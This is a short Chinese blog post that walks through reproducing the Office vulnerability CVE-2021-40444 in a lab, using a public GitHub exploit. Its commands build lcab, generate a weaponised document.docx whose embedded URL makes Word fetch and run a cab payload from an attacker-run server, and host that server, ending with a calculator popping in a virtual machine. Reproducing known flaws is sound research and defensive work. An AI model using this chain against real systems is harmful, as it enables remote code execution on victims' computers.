本文的標(biāo)題是《2021年的word文檔還有漏洞,Office 1day CVE-2021-40444復(fù)現(xiàn)》來源于:由作者:陳鵬羽采編而成,主要講述了項(xiàng)目地址在https://github.com/lo
項(xiàng)目地址在https://github.com/lockedbyte/CVE-2021-40444。先下載到kali里。
由于此項(xiàng)目必須使用lcab,所以我們先在kail里安裝一下。
wget http://ftp.debian.org/debian/pool/main/l/lcab/lcab_1.0b12.orig.tar.gz
tar zxvf lcab_1.0b12.orig.tar.gz
cd lcab-1.0b12
./configure
make
sudo make install
which lcab
# 查看幫助信息
lcab –help
進(jìn)入下載后的CVE-2021-40444目錄里,執(zhí)行:
python3 exploit.py generate test/calc.dll http://<SRV IP>:3333
看見“You can execute now the server and then send document.docx to target” 說明就可以了。
然后用python開一個(gè)http服務(wù),端口用剛剛設(shè)置的3333 或者自己設(shè)置的端口號(hào)。
sudo python3 exploit.py host 3333
把CVE-2021-40444目錄里的子目錄out下的document.docx文件copy到虛擬機(jī)中執(zhí)行。
word打開后,可以看見這里在下載我們kali上的html文件。
html又會(huì)下載calc.cab 文件執(zhí)行其中的命令,最后彈出計(jì)算器。
服務(wù)端顯示的結(jié)果:
本文原作者為陳鵬羽,轉(zhuǎn)載請(qǐng)注明:出處!如該文有不妥之處,請(qǐng)聯(lián)系站長(zhǎng)刪除,謝謝合作~
原創(chuàng)文章,作者:陳鵬羽,如若轉(zhuǎn)載,請(qǐng)注明出處:http://www.uuuxu.com/20220512315602.html